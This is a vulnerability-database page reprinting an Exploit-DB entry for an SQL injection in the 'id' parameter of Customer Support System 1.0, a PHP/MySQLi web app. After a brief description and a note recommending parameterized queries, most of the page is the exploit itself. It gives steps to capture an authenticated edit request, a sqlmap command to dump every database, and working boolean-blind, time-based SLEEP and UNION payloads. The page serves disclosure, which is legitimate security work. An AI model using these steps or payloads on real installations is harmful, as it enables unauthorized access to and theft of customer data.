Customer Support System 1.0 - 'id' SQL Injection

vendor:

Customer Support System

by:

Saeed Bala Ahmed (r0b0tG4nG)

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Customer Support System

Affected Version From: Version 1

Affected Version To:

Patch Exists: Unpatched

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Parrot OS

2020

Customer Support System 1.0 – ‘id’ SQL Injection

The application is vulnerable to SQL Injection in the 'id' parameter. By manipulating the 'id' parameter in the URL, an attacker can execute arbitrary SQL queries and potentially gain unauthorized access to the database.

Mitigation:

To mitigate this vulnerability, the application should implement proper input validation and parameterized queries to prevent SQL Injection attacks.

Source

Exploit-DB raw data:

# Exploit Title: Customer Support System 1.0 - 'id' SQL Injection
# Exploit Author: Saeed Bala Ahmed (r0b0tG4nG)
# Date: 2020-12-11
# Google Dork: N/A
# Vendor Homepage: https://www.sourcecodester.com/php/14587/customer-support-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14587&title=Customer+Support+System+using+PHP%2FMySQLi+with+Source+Code
# Affected Version: Version 1
# Patched Version: Unpatched
# Category: Web Application
# Tested on: Parrot OS

Step 1. Login to the application with admin credentials

Step 2. Click on Customer and select list.

Step 3. On Customer list page, click on action and select edit. Capture the request made to "http://localhost/index.php?page=edit_customer&id=2" in burpsuite

Step 4. Save request and run sqlmap on request file using command " sqlmap -r request -p id --time-sec=5 --dbs ".

Step 5. This will inject successfully and you will have an information disclosure of all databases contents.

---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: page=edit_staff&id=1 AND 4164=4164

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: page=edit_staff&id=1 AND (SELECT 9430 FROM (SELECT(SLEEP(5)))HIyV)

    Type: UNION query
    Title: Generic UNION query (NULL) - 10 columns
    Payload: page=edit_staff&id=-8018 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a716a71,0x497a58666d50656449704b4d76784f43577748416175666f44685869774177416f454c546458536d,0x717a7a6a71),NULL,NULL,NULL,NULL,NULL-- -
---